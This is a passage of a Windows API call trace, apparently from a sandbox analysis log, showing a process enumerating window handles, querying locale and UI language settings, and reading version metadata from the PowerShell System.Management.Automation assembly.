	[0695.279] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0xc2c
	[0695.279] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0xa1c
	[0695.279] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x1244
	[0695.279] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0xdb0
	[0695.280] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x1398
	[0695.280] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x1358
	[0695.280] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x1370
	[0695.280] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x1340
	[0695.280] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x130c
	[0695.280] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x12c0
	[0695.280] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x12e4
	[0695.280] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x1270
	[0695.281] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x1298
	[0695.281] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x120c
	[0695.281] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x122c
	[0695.281] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x11c4
	[0695.281] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x11b0
	[0695.281] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x1188
	[0695.281] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x1148
	[0695.281] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x1160
	[0695.282] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x10fc
	[0695.282] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0xe34
	[0695.282] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0xea4
	[0695.282] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x514
	[0695.282] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0xe48
	[0695.282] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0xbc8
	[0695.282] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0xdf8
	[0695.282] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x318
	[0695.283] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0xcac
	[0695.283] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x8bc
	[0695.283] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0xf9c
	[0695.283] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0xf48
	[0695.283] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0xe40
	[0695.283] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0xecc
	[0695.283] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0xeb8
	[0695.283] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0xe80
	[0695.284] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0xe98
	[0695.284] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0xe60
	[0695.284] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0xee4
	[0695.284] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0xf00
	[0695.284] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0xdf0
	[0695.284] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0xe1c
	[0695.284] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0xdd0
	[0695.284] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0xd94
	[0695.284] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0xd74
	[0695.285] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0xd00
	[0695.285] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0xcd8
	[0695.285] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0xc84
	[0695.285] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0xca4
	[0695.285] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0xc64
	[0695.285] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0xc24
	[0695.285] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0xb84
	[0695.285] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0xbac
	[0695.286] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x384
	[0695.286] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0xab8
	[0695.286] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x33c
	[0695.286] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0xa44
	[0695.286] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0xa64
	[0695.286] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x8a8
	[0695.286] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0xaf0
	[0695.286] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x88c
	[0695.287] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0xb04
	[0695.287] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x910
	[0695.287] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x230
	[0695.287] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0xac0
	[0695.287] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0xab4
	[0695.287] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0xaac
	[0695.287] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x3d0
	[0695.287] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x978
	[0695.287] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0xa7c
	[0695.288] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x59c
	[0695.288] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0xa88
	[0695.288] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0xa6c
	[0695.288] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0xa68
	[0695.288] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x9f8
	[0695.288] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0xa04
	[0695.288] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x924
	[0695.288] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x8dc
	[0695.289] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x7dc
	[0695.289] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x768
	[0695.289] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x764
	[0695.289] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x820
	[0695.289] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x810
	[0695.289] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x794
	[0695.289] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x83c
	[0695.289] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x7ac
	[0695.290] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0xb44
	[0695.290] GetWindowThreadProcessId (in: hWnd=0x108d6, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x6bc
	[0695.290] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0xb5c
	[0695.290] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x838
	[0695.290] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x4d0
	[0695.290] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x4d0
	[0695.290] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x4d0
	[0695.290] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x4d0
	[0695.290] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x4d0
	[0695.291] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x4d0
	[0695.291] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x4d0
	[0695.291] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x4d0
	[0695.291] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x818
	[0695.291] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x5b8
	[0695.291] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x494
	[0695.291] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x1ec
	[0695.291] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x440
	[0695.292] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x7e8
	[0695.292] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x730
	[0695.292] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x2c8
	[0695.292] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x31c
	[0695.292] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x330
	[0695.292] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x128
	[0695.292] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x5c8
	[0695.292] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x6f8
	[0695.292] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x358
	[0695.292] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x73c
	[0695.293] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0xb0
	[0695.293] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x250
	[0695.293] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x240
	[0695.293] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x790
	[0695.293] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x61c
	[0695.293] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x540
	[0695.293] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x538
	[0695.293] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x568
	[0695.293] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x538
	[0695.293] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x568
	[0695.294] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x538
	[0695.294] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x540
	[0695.294] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x540
	[0695.294] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x57c
	[0695.294] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x460
	[0695.294] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x554
	[0695.294] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x4d0
	[0695.294] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x528
	[0695.294] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x4d0
	[0695.295] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x4d0
	[0695.295] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x4d0
	[0695.295] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x79c
	[0695.295] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x4d0
	[0695.295] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x4e0
	[0695.295] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x4d0
	[0695.296] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x460
	[0695.296] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x460
	[0695.296] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x44c
	[0695.296] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x778
	[0695.296] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x460
	[0695.296] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x558
	[0695.296] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x4d0
	[0695.296] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x4d0
	[0695.297] GetWindowThreadProcessId (in: hWnd=0x1095a, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x1c2c
	[0695.297] GetWindowThreadProcessId (in: hWnd=0x10966, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x1c08
	[0695.297] GetWindowThreadProcessId (in: hWnd=0x10964, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x1c0c
	[0695.297] GetWindowThreadProcessId (in: hWnd=0x10962, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x1c10
	[0695.297] GetWindowThreadProcessId (in: hWnd=0x1095e, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x1c14
	[0695.297] GetWindowThreadProcessId (in: hWnd=0x2043c, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x1c18
	[0695.301] WerSetFlags () returned 0x0
	[0700.681] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0700.682] CoTaskMemFree (pv=0x0) 
	[0700.683] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x14de68, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x14de60 | out: pulNumLanguages=0x14de68, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x14de60) returned 1
	[0700.683] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x14de68, pwszLanguagesBuffer=0x2ca70d0, pcchLanguagesBuffer=0x14de60 | out: pulNumLanguages=0x14de68, pwszLanguagesBuffer=0x2ca70d0, pcchLanguagesBuffer=0x14de60) returned 1
	[0700.688] CoTaskMemAlloc (cb=0x24) returned 0x237be0
	[0700.688] GetUserDefaultLocaleName (in: lpLocaleName=0x237be0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0700.689] CoTaskMemFree (pv=0x237be0) 
	[0702.806] CoTaskMemAlloc (cb=0x104) returned 0x1d1840
	[0702.806] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1d1840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0702.806] CoTaskMemFree (pv=0x1d1840) 
	[0702.809] CoTaskMemAlloc (cb=0x104) returned 0x1d1840
	[0702.809] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1d1840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0702.809] CoTaskMemFree (pv=0x1d1840) 
	[0702.811] CoTaskMemAlloc (cb=0x104) returned 0x1d1840
	[0702.811] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1d1840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0702.811] CoTaskMemFree (pv=0x1d1840) 
	[0702.821] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0702.821] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0702.821] SetErrorMode (uMode=0x1) returned 0x1
	[0702.822] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x14dae0 | out: lpFileInformation=0x14dae0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0702.822] SetErrorMode (uMode=0x1) returned 0x1
	[0702.822] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x14dd50 | out: lpdwHandle=0x14dd50) returned 0x94c
	[0702.823] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2caa960 | out: lpData=0x2caa960) returned 1
	[0702.825] VerQueryValueW (in: pBlock=0x2caa960, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x14dcc8, puLen=0x14dcc0 | out: lplpBuffer=0x14dcc8*=0x2caa9fc, puLen=0x14dcc0) returned 1
	[0702.825] VerQueryValueW (in: pBlock=0x2caa960, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x14dc38, puLen=0x14dc30 | out: lplpBuffer=0x14dc38*=0x2caaad8, puLen=0x14dc30) returned 1
	[0702.825] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0702.825] CoTaskMemAlloc (cb=0x2e) returned 0x239e40
	[0702.825] lstrcpyW (in: lpString1=0x239e40, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0702.825] CoTaskMemFree (pv=0x239e40) 
	[0702.825] VerQueryValueW (in: pBlock=0x2caa960, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x14dc38, puLen=0x14dc30 | out: lplpBuffer=0x14dc38*=0x2caab2c, puLen=0x14dc30) returned 1
	[0702.825] lstrlenW (lpString="System.Management.Automation") returned 28
	[0702.825] CoTaskMemAlloc (cb=0x3c) returned 0x240970
	[0702.825] lstrcpyW (in: lpString1=0x240970, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0702.825] CoTaskMemFree (pv=0x240970) 
	[0702.825] VerQueryValueW (in: pBlock=0x2caa960, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x14dc38, puLen=0x14dc30 | out: lplpBuffer=0x14dc38*=0x2caab88, puLen=0x14dc30) returned 1
	[0702.825] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0702.825] CoTaskMemAlloc (cb=0x20) returned 0x23d920
	[0702.825] lstrcpyW (in: lpString1=0x23d920, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0702.825] CoTaskMemFree (pv=0x23d920) 
	[0702.825] VerQueryValueW (in: pBlock=0x2caa960, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x14dc38, puLen=0x14dc30 | out: lplpBuffer=0x14dc38*=0x2caabc8, puLen=0x14dc30) returned 1
	[0702.825] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0702.825] CoTaskMemAlloc (cb=0x44) returned 0x240970
	[0702.825] lstrcpyW (in: lpString1=0x240970, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0702.825] CoTaskMemFree (pv=0x240970) 
	[0702.825] VerQueryValueW (in: pBlock=0x2caa960, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x14dc38, puLen=0x14dc30 | out: lplpBuffer=0x14dc38*=0x2caac30, puLen=0x14dc30) returned 1
	[0702.825] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0702.825] CoTaskMemAlloc (cb=0x76) returned 0x1cf9e0
